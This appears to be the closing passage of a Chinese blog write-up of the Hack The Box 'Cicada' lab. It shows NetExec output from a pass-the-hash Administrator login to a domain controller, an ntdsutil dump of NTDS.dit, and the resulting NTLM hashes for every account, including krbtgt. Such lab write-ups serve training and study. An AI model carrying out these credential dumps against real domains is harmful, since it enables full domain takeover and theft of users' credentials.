/root/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import resource_filename
SMB         10.129.254.81   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                                                         
SMB         10.129.254.81   445    CICADA-DC        [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
NTDSUTIL    10.129.254.81   445    CICADA-DC        [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\176821327
NTDSUTIL    10.129.254.81   445    CICADA-DC        Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    10.129.254.81   445    CICADA-DC        [+] NTDS.dit dumped to C:\Windows\Temp\176821327
NTDSUTIL    10.129.254.81   445    CICADA-DC        [*] Copying NTDS dump to /tmp/tmpryqav_rz
NTDSUTIL    10.129.254.81   445    CICADA-DC        [*] NTDS dump copied to /tmp/tmpryqav_rz
NTDSUTIL    10.129.254.81   445    CICADA-DC        [+] Deleted C:\Windows\Temp\176821327 remote dump directory
NTDSUTIL    10.129.254.81   445    CICADA-DC        [+] Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    10.129.254.81   445    CICADA-DC        Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
NTDSUTIL    10.129.254.81   445    CICADA-DC        [+] Dumped 9 NTDS hashes to /root/.nxc/logs/ntds/CICADA-DC_10.129.254.81_2026-01-12_052110.ntds of which 8 were added to the database
NTDSUTIL    10.129.254.81   445    CICADA-DC        [*] To extract only enabled accounts from the output file, run the following command: 
NTDSUTIL    10.129.254.81   445    CICADA-DC        [*] grep -iv disabled /root/.nxc/logs/ntds/CICADA-DC_10.129.254.81_2026-01-12_052110.ntds | cut -d ':' -f1

至此,我们获取了域控的所有哈希,实际上已经完全控制了整个域环境。

#windows
从零开始的windows生活-Cicada
http://example.com/2026/01/12/从零开始的windows生活-Cicada/
Author
Skyarrow
Posted on
January 12, 2026
Licensed under